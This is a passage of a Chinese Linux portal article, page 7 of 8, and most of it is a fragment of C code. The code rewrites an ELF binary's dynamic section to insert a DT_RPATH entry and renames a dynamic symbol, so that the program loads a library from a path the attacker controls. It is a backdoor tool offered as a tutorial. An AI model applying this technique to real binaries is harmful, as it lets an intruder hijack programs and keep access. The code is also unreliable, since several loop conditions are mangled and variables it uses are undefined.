Linux中国 Linux中国门户站!
设为主页 设为主页
收藏本站 收藏本站
 
当前位置 :首页 ->Linux技术 ->系统管理 ->正文

Linux系统下解析Elf文件DT_RPATH后门

来源: 作者: 时间:2007-04-11 点击: [收藏] [投稿]

}

dynp++;

}

out:

printf("no space\n");

free(dyn);

return -1;

modify:

if(lseek(fd,shdyn->sh_offset+offset,SEEK_SET)!=shdyn->sh_offset+offset)

ERR("lseek");

if(write(fd,&dt_rpath,sizeof(dynp->d_tag))!=sizeof(dynp->d_tag))

ERR("write");

if(write(fd,index,sizeof(dynp->d_un。d_val))!=sizeof(dynp->d_un。d_val))

ERR("write");

printf("+game over\n");

free(dyn);

return 0;

}

/*---------------------------------modifiy symbol name-------------------------------------------*/

static int mod_sym(int fd , Elf32_Ehdr * ehdr,Elf32_Shdr * shdr,char * symname)

{

Elf32_Shdr * shdrp=shdr;//for loop

Elf32_Shdr * strsym;

char * string;

Elf32_Sym *sym,*symp;

int i;

int find=0;

for(i=0;ie_shnum;i++)

{

if(shdrp->sh_type==SHT_DYNSYM)

{ find=1;

break;

}

shdrp++;

}

if(!find)

{

printf("not find SHT_DYNSYM\n");

exit(1);

}

strsym=&shdr[shdrp->sh_link];

string=(char *)malloc(strsym->sh_size);

if(strsym==NULL)

ERR("malloc");

if(lseek(fd,strsym->sh_offset,SEEK_SET)!=strsym->sh_offset)

ERR("lseek");

if(read(fd,string,strsym->sh_size)!=strsym->sh_size)

ERR("read");

sym=(Elf32_Sym *)malloc(shdrp->sh_size);

if(sym==NULL)

ERR("malloc");

if(lseek(fd,shdrp->sh_offset,SEEK_SET)!=shdrp->sh_offset)

ERR("malloc");

if(read(fd,sym,shdrp->sh_size)!=shdrp->sh_size)

ERR("read");

symp=sym;

for(i=0;ish_size;i+=shdrp->sh_entsize)

{

if(!strcmp(&string[symp->st_name],symname))

{

if(lseek(fd,strsym->sh_offset+symp->st_name,SEEK_SET)!=strsym->sh_offset+symp->st_name)

ERR("lseek");

printf("+modify %s to %s \n",symgname,myname);

if(write(fd,myname,strlen(symgname))!=strlen(symgname))

ERR("write");

free(string);

return symp->st_name;

}

symp++;

}

printf("not find match symbol\n");

return -1;

}

/*---------------------------------file check--------------------------------------------*/

void elf_check(Elf32_Ehdr *ehdr)

{

//add your code here ,not supply

}

/*---------------------------------------main----------------------------------------------------*/

int main(int argc , char * argv[])

{

Elf32_Ehdr ehdr;

Elf32_Phdr *phdr;

Elf32_Shdr *shdr;

char *sdata;

int ofshoff,slen;

int fd;

unsigned int index;

if(argc!=2)

{ printf("usage:%s \n"

"elfADDRPATH by wujianqiang@mail。china。com\n",

argv[0]

 如果您对本文有任何疑问或者建议,请到讨论区发表您的意见: >> 论坛入口 <<

上一页 1 2 3 4 5 6 78 下一页


上一篇:Linux系统调用的执行过程是怎么样的?   下一篇:Linux系统中实现内部进程通信的方法

文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【我要投稿】 【论坛讨论
更多相关文章
·Motorola微处理器bootloader分析与应用
·Fedora Core5 NFS服务器搭建过程介绍
·Linux系统:让内存不再泄漏的实用技巧
·新手看招 手把手教你安装VMware虚拟机
·“侵权事件” 红帽称微软企图干扰用户
·删除Linux后 如何找回Windows启动菜单
·菜鸟乐园 Linux中常见文件系统格式介绍
·Linux操作系统下IPTables配置方法详解
·实用技巧 Linux系统的经典使用技巧八则
·Linux系统文件优化及磁盘检查方法介绍
推荐文章
·iptables配置工具比较
·Linux系统下X终端的详细使用方法
·Enhydra介绍
·Linux 指令篇:文件系统--swapon
·Linux网络安全之经验谈(4)
·Sendmail第八章:规则
·Linux系统文件优化及磁盘检查方法介
·在GoF模式以外(1)
精彩文章
·Linux 指令篇:设备管理--loadkeys
·一个网上理财站点的设计(十五)
·嗅探器检测工具和对策
·Linux 网管 123 --- 第9章. 各种杂
·Linux下架设安全的Web邮件服务器
·Modules的概念及使用
·LVS分析(上)
·Linux下网卡设置常见问题
·深入解剖 LILO
·软件项目管理(CMM)经验谈
·Zip Drive Mini-HOWTO
·Linux 网管 123 --- 第10章. 升级 L
·Linux Shadow-Password-HOWTO - 5.
·Linux 每次启动时钟日期就多了 8 小
·使用xinetd
·Sendmail第六章:邮件中枢与分发代理
·OpenLDAP快速指南
·用SYN包特性增强网络安全
·Oracle 9i 在Red Hat Linux 7.3下的
·[网卡]3Com网卡的FAQ
·Linux组网入门(5):DNS服务器
·JSP安全编程实例浅析
·一个网上理财站点的设计(八)
·Linux 网管 123 --- 第6章. 一般系
·Linux 网管 123 --- 第7章. 自订的
·起步走 二十五步跟我搞定Linux系统
Power by linux-cn.com 粤ICP备05006655号